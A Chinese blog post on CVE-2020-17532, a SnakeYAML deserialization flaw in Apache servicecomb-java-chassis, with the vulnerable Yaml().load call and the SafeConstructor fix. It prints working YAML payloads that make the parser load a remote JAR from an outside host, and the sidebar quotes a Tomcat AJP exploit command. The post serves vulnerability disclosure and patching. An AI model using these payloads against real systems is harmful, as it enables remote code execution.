[CVE-2020-17532] Apache servicecomb-java-chassis Yaml remote deserialization vulnerability

于 2021-01-21 20:24:50 发布
阅读量458 收藏
点赞数
分类专栏: java Web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/112971269
版权
安全 同时被 3 个专栏收录
264 篇文章 9 订阅
订阅专栏
Web
220 篇文章 7 订阅
订阅专栏
java
213 篇文章 3 订阅
订阅专栏

刚看到邮件列表里的yaml反序列化漏洞:
https://seclists.org/oss-sec/2021/q1/60
修复的commit还有测试用例都在里面:
https://github.com/apache/servicecomb-java-chassis/commit/839a52e27c754cb5ce14f20063902f21065bd26c

影响版本:
< 2.1.5

又是yaml反序列化:

!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://127.0.0.1/"]]]]

或者:

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://artsploit.com/yaml-payload.jar"]
  ]]
]

漏洞点都是:

new org.yaml.snakeyaml.Yaml().load(String payload)

修复方法都是:

new org.yaml.snakeyaml.Yaml(new SafeConstructor()).load(String payload)

感觉最近一段时间听说这种yaml反序列化的越来越多了。可能大家开始往这方便搞了?毕竟yaml经常作为配置文件,载入配置文件就可以RCE。

之前出的[CVE-2020-1947]Apache ShardingSphere UI YAML RCE
也是类似的,只不过它用自己的API包装了一下:

YamlEngine.unmarshal

参考:

  • https://www.mi1k7ea.com/2019/11/29/Java-SnakeYaml%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/#%E5%A4%8D%E7%8E%B0%E5%88%A9%E7%94%A8%EF%BC%88%E5%9F%BA%E4%BA%8EScriptEngineManager%E5%88%A9%E7%94%A8%E9%93%BE%EF%BC%89
  • https://github.com/artsploit/yaml-payload
caiqiiqi
关注
专栏目录
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
Apache SSI 远程命令执行漏洞
m0_52701599的博客
02-19 843
Apache SSI 远程命令执行漏洞
查看openssh版本_OpenSSH命令注入漏洞复现(CVE202015778)
weixin_39707536的博客
12-06 1631
OpenSSH命令注入漏洞复现(CVE-2020-15778)目录漏洞描述漏洞等级漏洞影响版本漏洞复现修复建议▶漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实现。通过对交互的流量进行加密防止窃听,连接劫持以及其他攻击。OpenSSH由OpenBSD项目的一些开发人员开发, 并以BSD样式的许可证提供,且已被集成到许多商业产品中。 2020年6月9日,研...
初识ServiceComb
ShootingStar_1998的博客
07-06 2219
初识ServiceComb一、什么是ServiceComb二、ServiceComb的使用2.1 Service-Center注册中心2.2 搭建ServiceComb项目2.3 ServiceComb配置欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你
ServiceComb微服务框架
热门推荐
学习记录和总结
05-08 1万+
华为提供的微服务解决方案:Service Comb
go-chassis调研
weixin_43827144的博客
10-21 509
go-chassis https://github.com/go-chassis/go-chassis 要求:Go version>=1.12 and GO111MODULE=on Go chassis是一个go语言微服务开发框架 go chassis特性: 插件化注册中心: 默认支持Service Center,kubernetes,istio 动态治理框架: 通过此框架,开发者可实现进程...
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool(又名嵌入 org.glassfish 中的 Xalan)相关的序列化小工具和类型之间的交互。...
CVE-2020-13957 Apache Solr 未授权上传.md
04-13
CVE-2020-13957 Apache Solr 未授权上传
CVE-2020-1938 Apache Tomcat 文件包含EXP
03-29
# CVE-2020-1938 Apache Tomcat 文件包含 影响版本: Tomcat6-9 Exp: ``` python CNVD-2020-10487-Tomcat-Ajp-lfi.py x.x.x.x -p 8009 -f urfile 一. 漏洞概述 2月20日,国家信息安全漏洞共享平台(CNVD)...
加载不可信的YAML格式的文件或字符串时,调用默认的yaml.load不安全
weixin_42299862的博客
03-28 1142
一、 什么是yaml格式文件的解析? yaml是一种类似xml和json的用于格式化数据的标记语言,解析即将yaml文件加载为一个Map对象。 举个例子,这是一个yaml文件 python: 3.5.3 postgres: 9.3 解析后该文件加载为一个Map对象: {‘python’: ‘3.5.3’, ‘postgres’: 9.3} 二、系列化和反序列化 序列化是将对象转换成字节流的过程,而...
ServiceComb认证鉴权解决方案之ServiceComb-Fence
微服务技术与实践专栏
05-27 1700
开发者可以使用 servicecomb-fence 给 servicecomb-java-chassis 微服务项目增加基于 OpenID Connect 的认证鉴权能力。 认证鉴权流程介绍 密码模式 Client 输入用户名密码向 Authentication Server 请求 Token。 ** HTTP Request ** POST http://localhost:9090/...
配置中心.zip
最新发布
09-24
配置中心
基于java的物流管理系统报告的开题报告.docx
09-24
基于java的物流管理系统报告的开题报告.docx
企业级SpringCould脚手架工程:Eureka、Ribbon、Hystrix、Zuul、Feign、分布式事务.zip
09-24
企业级SpringCould脚手架工程:Eureka、Ribbon、Hystrix、Zuul、Feign、分布式事务、分布式锁、
基于Java的微信小程序html2wxml转换接口设计源码
09-24
该项目是基于Java的微信小程序html2wxml转换接口设计源码,共包含50个文件,其中包括10个属性配置文件、9个XML配置文件、6个首选项文件、6个Java源文件、3个Shell脚本、2个项目配置文件、2个HTML模板文件、1个类路径配置文件、1个Git忽略配置文件和1个JS类型定义文件。该解决方案利用JFinal、Jsoup和FastJson技术,为微信小程序提供高效的富文本渲染能力。
嵌入式学习之电子音乐门铃.zip
09-24
嵌入式学习资料电子信息与技术
习题集Python基础习题集.zip
09-24
【习题集】Python基础习题集.zip 【习题集】Python基础习题集.zip 【习题集】Python基础习题集.zip 【习题集】Python基础习题集.zip
基于Python、HTML、JavaScript和CSS的鹿鹿泽健身网站设计源码
09-24
该项目是一个基于Python、HTML、JavaScript和CSS的健身网站设计源码,名为鹿鹿泽健身。它包含94个文件,其中36个Python文件、28个HTML文件、5个VBS脚本、4个JavaScript文件、3个配置文件、3个SVG图形文件、3个PNG图片文件、2个文本文件、2个批处理文件、2个JPG图片文件。这个网站适用于健身爱好者,提供丰富的健身内容和互动功能。
Apache Unomi 1.5.2以下版本面临CVE-2020-13942远程代码执行漏洞
"CVE-2020-13942 是一个针对Apache Unomi的严重安全漏洞,涉及远程代码执行(Remote Code Execution, RCE)风险。Apache Unomi 是一款开源的事件管理和分析平台,用于收集、处理和分析应用程序的日志和事件数据。这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值